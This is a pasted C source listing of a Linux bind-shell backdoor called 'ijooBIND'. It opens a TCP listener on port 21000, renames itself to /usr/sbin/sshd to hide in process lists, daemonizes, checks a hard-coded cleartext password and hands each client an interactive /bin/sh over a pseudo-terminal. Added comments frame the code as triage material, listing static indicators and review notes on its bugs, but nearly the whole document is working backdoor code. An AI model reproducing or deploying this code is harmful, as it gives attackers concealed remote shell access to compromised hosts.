genol

bind

May 21st, 2020
/*
 * Build-time configuration of the bind shell. The string and numeric values
 * below are compiled into the binary as-is, which makes them usable as static
 * indicators when triaging a suspect file or host.
 */
#define HOME "/" /* value placed in the HOME= entry of the spawned shell's environment */
/*
 * Terminal ioctl request numbers, hard-coded instead of taken from a system
 * header. NOTE(review): these look like the Linux values - confirm for the
 * platform under analysis. TIOCGWINSZ is defined but not referenced anywhere
 * in this listing.
 */
#define TIOCSCTTY 0x540E
#define TIOCGWINSZ 0x5413
#define TIOCSWINSZ 0x5414
#define ECHAR 0x1d /* byte that introduces a 5-byte window-size message in the client stream (parsed in main) */
#define PORT 21000 /* TCP port the listener binds on all local addresses */
#define BUF 32768 /* size in bytes of the relay buffer used between socket and pty */
#define proc "/usr/sbin/sshd" /* string copied over argv[0] in main, so process listings show this name */
  9.  
  10. #include
  11. #include
  12. #include
  13. #include
  14. #include
  15. #include
  16. #include
  17. #include
  18. #include
  19. #include
  20. #include
  21. #include
  22.  
/*
 * Local declaration of the terminal window-size record passed to the
 * TIOCSWINSZ ioctl in main. It is declared here by hand rather than taken
 * from a system header.
 */
struct winsize {
    unsigned short ws_row;    /* rows; filled from bytes 3-4 of the client's window-size message */
    unsigned short ws_col;    /* columns; filled from bytes 1-2 of the client's window-size message */
    unsigned short ws_xpixel; /* always set to 0 by main */
    unsigned short ws_ypixel; /* always set to 0 by main */
};
  29.  
/*
 * File descriptor used by cb_shell() for the password dialogue. Nothing in
 * this listing assigns it, so as a file-scope object it stays 0 (standard
 * input), which main has pointed at the pty slave by the time cb_shell() runs.
 */
int sc;
/*
 * Hard-coded access password, stored in clear text. Together with the banner
 * below and the banner in cb_shell() it is embedded verbatim in the compiled
 * binary, so these literals are usable as static signatures for a suspect file.
 */
char passwd[] = "sikatro0t2100";
/* Banner sent to the client after a successful password check. */
char motd[] ="=- iJoo PriVatE BaCkd00r -=\n";
  33.  
/*
 * Password gate that runs in the subshell child immediately before the shell
 * is executed.
 *
 * Writes a prompt banner to descriptor sc, reads the reply into a 150-byte
 * stack buffer and compares only its first strlen(passwd) bytes with the
 * hard-coded password. On a match the motd banner is written and the function
 * returns (main then calls execve); otherwise "DiE!!!\n" is written, sc is
 * closed and the process exits with status 0.
 *
 * The prompt, the password and both replies are exchanged without any
 * encryption in this code, so the banner strings are also observable in
 * network captures of a session.
 */
void cb_shell() {
    char buffer[150];

    write(sc, "..:+: WelCome To ijooBIND TeLNet :+:..\nPassWord: ", 50);
    /* NOTE(review): the return value of read() is not checked and buffer is
     * not initialised, so after a failed or empty read the comparison below
     * runs on indeterminate stack contents. */
    read(sc, buffer, sizeof(buffer));
    /* Prefix comparison: bytes following the password in the reply are ignored. */
    if (!strncmp(buffer, passwd, strlen(passwd))) {
        /* sizeof(motd) includes the terminating NUL, so that byte is sent too. */
        write(sc, motd, sizeof(motd));
    }
    else {
        write(sc, "DiE!!!\n", 7);
        close(sc); exit(0);
    }
}
  47.  
/*
 * Build a legacy BSD-style pseudo-terminal device name for index num.
 *
 * Copies base into buf and appends two characters: one picked from
 * "pqrstuvwxyzabcde" by bits 4-7 of num and one hexadecimal digit picked by
 * bits 0-3, followed by a terminating NUL. With base "/dev/pty" and num 0 the
 * result is "/dev/ptyp0".
 *
 * buf must have room for strlen(base) + 3 bytes; the function does not check
 * this.
 */
void get_tty(int num, char *base, char *buf)
{
    char series[] = "pqrstuvwxyzabcde";
    char subs[] = "0123456789abcdef";
    int pos = strlen(base);
    strcpy(buf, base);
    buf[pos] = series[(num >> 4) & 0xF];
    buf[pos+1] = subs[num & 0xF];
    buf[pos+2] = 0;
}
  59.  
/*
 * Find a free legacy pty pair and open both ends.
 *
 * Tries the 256 names produced by get_tty() in order: the master
 * "/dev/ptyXY" first, then the matching slave "/dev/ttyXY". On the first pair
 * where both opens succeed, stores the master descriptor in *pty and the
 * slave descriptor in *tty and returns 1. Returns 0 when no pair could be
 * opened; main then tells the client "Can't fork pty, bye!" and exits.
 *
 * For monitoring: each call produces a run of open() attempts on these device
 * paths, which syscall tracing or file-access auditing can record.
 */
int open_tty(int *tty, int *pty)
{
    char buf[512];
    int i, fd;

    /* /dev/ptmx is opened and closed again at once; the descriptor is never
     * used, and close() is called even if the open failed (fd == -1). */
    fd = open("/dev/ptmx", O_RDWR);
    close(fd);

    for (i=0; i < 256; i++) {
        get_tty(i, "/dev/pty", buf);
        *pty = open(buf, O_RDWR);
        if (*pty < 0) continue;
        get_tty(i, "/dev/tty", buf);
        *tty = open(buf, O_RDWR);
        if (*tty < 0) {
            /* slave side unavailable: release the master and try the next index */
            close(*pty);
            continue;
        }
        return 1;
    }
    return 0;
}
  83.  
  84.  
  85.  
/*
 * SIGCHLD handler installed by the daemonized listener so that finished
 * per-connection children do not remain as zombies.
 *
 * Re-installs itself and then reaps at most one exited child without
 * blocking (WNOHANG). The signal number argument i is not used.
 */
void sig_child(int i)
{
    signal(SIGCHLD, sig_child);
    waitpid(-1, NULL, WNOHANG);
}
  92.  
/*
 * Handler that main installs for SIGHUP and SIGTERM in the per-connection
 * relay process.
 *
 * Sends SIGHUP and then SIGTERM to every process in the caller's own process
 * group (pid argument 0), which includes the caller itself. The signal number
 * argument i is not used.
 */
void hangout(int i)
{
    kill(0, SIGHUP);
    kill(0, SIGTERM);
}
  98.  
/*
 * Entry point of the bind shell.
 *
 * Behaviour visible in this listing, in order:
 *   1. overwrites argv[0] with "/usr/sbin/sshd" (the proc macro);
 *   2. opens a TCP listener on PORT (21000) on all local addresses;
 *   3. prints a start-up banner, forks, and lets the parent exit;
 *   4. the child detaches (setsid, chdir "/", stdio redirected to /dev/null)
 *      and accepts connections forever, forking once per connection;
 *   5. each connection child reads environment strings from the client,
 *      allocates a legacy pty pair, and forks again: one process checks the
 *      password (cb_shell) and executes /bin/sh -i on the pty slave, the other
 *      relays bytes between the socket and the pty master.
 *
 * Points an analyst can check on a host, all derived from the code below:
 * a listening TCP socket on port 21000; a process whose displayed name is
 * /usr/sbin/sshd although its executable is a different file (argv[0] is only
 * a display string - NOTE(review): compare with the executable path the OS
 * records for the process); and an interactive "sh -i" started by such a
 * process. Returns 1 if socket/bind/listen fail and 0 from the original
 * parent; the daemonized child never returns.
 */
int main (int argc, char *argv[])
{

    int pid;
    struct sockaddr_in serv;
    struct sockaddr_in cli;
    int sock;
    char cmd[256]; /* never used in this listing */
    /* Process-name masquerade. strcpy has no bound here: the length of the
     * original argv[0] is not checked before the longer string is written. */
    strcpy (argv[0], proc);
    signal (SIGCHLD, SIG_IGN);
    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock < 0) {
        perror("socket");
        return 1;
    }

    /* Listen on every local interface (INADDR_ANY), not only loopback. */
    bzero((char *) &serv, sizeof(serv));
    serv.sin_family = AF_INET;
    serv.sin_addr.s_addr = htonl(INADDR_ANY);
    serv.sin_port = htons(PORT);
    if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0) {
        perror("bind");
        return 1;
    }
    if (listen(sock, 5) < 0) {
        perror("listen");
        return 1;
    }
    /* These banner literals are further fixed strings inside the binary. */
    printf("ijooBIND is starting..."); fflush(stdout);
    pid = fork();
    /* Any non-zero result ends this process, so a failed fork (-1) is
     * reported the same way as a successful one. */
    if (pid !=0 ) {
        printf("OK, pid = %d\n", pid);
        printf("#MalangHackerLink Private BackD00r.. on 21000\n");
        return 0;
    }

    /* Daemonize: new session, working directory "/", and stdin/stdout/stderr
     * all pointed at /dev/null. pid is reused here as a scratch descriptor. */
    setsid();
    chdir("/");
    pid = open("/dev/null", O_RDWR);
    dup2(pid, 0);
    dup2(pid, 1);
    dup2(pid, 2);
    close(pid);
    signal(SIGHUP, SIG_IGN);
    signal(SIGCHLD, sig_child);
    /* Accept loop: one forked child per connection; never terminates. */
    while (1) {
        int scli;
        int slen; /* declared int, passed to accept() as the address length */
        slen = sizeof(cli);
        scli = accept(sock, (struct sockaddr *) &cli, &slen);
        if (scli < 0) continue;
        pid = fork();
        if (pid == 0) {
            int subshell;
            int tty;
            int pty;
            fd_set fds;
            char buf[BUF];
            /* shadows main's argv parameter; argument vector for the shell */
            char *argv[] = {"sh", "-i", NULL};
#define MAXENV 256
#define ENVLEN 256
            char *envp[MAXENV];
            char envbuf[(MAXENV+2) * ENVLEN];
            int j, i;
            char home[256];
            /* Set up the environment for the shell. envp[0] is "HOME=/"; all
             * further entries are taken from the client in ENVLEN-byte chunks.
             * This exchange happens before any password is requested:
             * cb_shell() is only called later, in the subshell child. */
            envp[0] = home;
            sprintf(home, "HOME=%s", HOME);
            j = 0;
            /* Stops after MAXENV chunks, on a short or failed read, or when
             * the chunk just read starts with '\n'.
             * NOTE(review): a chunk that fills all ENVLEN bytes is stored
             * without a terminating NUL, and envp has only MAXENV elements
             * while the index j+1 used here and after the loop can reach
             * MAXENV and MAXENV+1, i.e. past the end of the array. */
            do {
                i = read(scli, &envbuf[j * ENVLEN], ENVLEN);
                envp[j+1] = &envbuf[j * ENVLEN];
                j++;
                if ((j >= MAXENV) || (i < ENVLEN)) break;
            } while (envbuf[(j-1) * ENVLEN] != '\n');
            envp[j+1] = NULL;

            /* put this connection handler into a process group of its own */
            setpgid(0, 0);

            /* open slave (tty) and master (pty) side of a pseudo-terminal */
            if (!open_tty(&tty, &pty)) {
                char msg[] = "Can't fork pty, bye!\n";
                write(scli, msg, strlen(msg));
                close(scli);
                exit(0);
            }
            /* fork the process that will become the shell */
            subshell = fork();
            if (subshell == 0) {
                /* close master */
                close(pty);
                /* new session with the pty slave as controlling terminal */
                setsid();
                ioctl(tty, TIOCSCTTY);
                /* the shell side needs neither the client nor the listening socket */
                close(scli);
                close(sock);
                signal(SIGHUP, SIG_DFL);
                signal(SIGCHLD, SIG_DFL);
                /* stdin/stdout/stderr become the pty slave */
                dup2(tty, 0);
                dup2(tty, 1);
                dup2(tty, 2);
                close(tty);
                /* Password dialogue over the pty; exits the process on a mismatch. */
                cb_shell();
                /* Interactive shell with the client-supplied environment.
                 * NOTE(review): there is no exit after execve, so if it fails
                 * this child continues into the relay code below. */
                execve("/bin/sh", argv, envp);
            }
            /* close slave */
            close(tty);

            signal(SIGHUP, hangout);
            signal(SIGTERM, hangout);

            /* Relay loop between the client socket and the pty master. */
            while (1) {
                /* watch tty and client side */
                FD_ZERO(&fds);
                FD_SET(pty, &fds);
                FD_SET(scli, &fds);
                if (select((pty > scli) ? (pty+1) : (scli+1),
                    &fds, NULL, NULL, NULL) < 0)
                {
                    break;
                }
                /* shell output -> client */
                if (FD_ISSET(pty, &fds)) {
                    int count;
                    count = read(pty, buf, BUF);
                    if (count <= 0) break;
                    if (write(scli, buf, count) <= 0) break;
                }
                /* client input -> shell */
                if (FD_ISSET(scli, &fds)) {
                    int count;
                    unsigned char *p, *d;
                    d = buf;
                    count = read(scli, buf, BUF);
                    if (count <= 0) break;

                    /* In-band window-size message: the byte ECHAR (0x1d)
                     * followed by four bytes, columns then rows, each as a
                     * high byte and a low byte. */
                    p = memchr(buf, ECHAR, count);
                    if (p) {
                        unsigned char wb[5];
                        int rlen = count - ((ulong) p - (ulong) buf);
                        struct winsize ws;

                        /* Fetch the rest of the 5-byte message if this read
                         * ended inside it; the result of that blocking read
                         * is not checked. */
                        if (rlen > 5) rlen = 5;
                        memcpy(wb, p, rlen);
                        if (rlen < 5) {
                            read(scli, &wb[rlen], 5 - rlen);
                        }

                        /* apply the new size to the pty and signal the process group */
                        ws.ws_xpixel = ws.ws_ypixel = 0;
                        ws.ws_col = (wb[1] << 8) + wb[2];
                        ws.ws_row = (wb[3] << 8) + wb[4];
                        ioctl(pty, TIOCSWINSZ, &ws);
                        kill(0, SIGWINCH);

                        /* Forward the bytes before and after the message;
                         * these writes are not checked for errors. */
                        write(pty, buf, (ulong) p - (ulong) buf);
                        rlen = ((ulong) buf + count) - ((ulong)p+5);
                        if (rlen > 0) write(pty, p+5, rlen);
                    } else
                        if (write(pty, d, count) <= 0) break;

                }
            }
            /* Session over: release descriptors, reap the shell, hang up the terminal. */
            close(scli);
            close(sock);
            close(pty);
            waitpid(subshell, NULL, 0);
            vhangup();
            exit(0);
        }
        /* Listener side (and failed fork): drop this process's copy of the client socket. */
        close(scli);
    }
}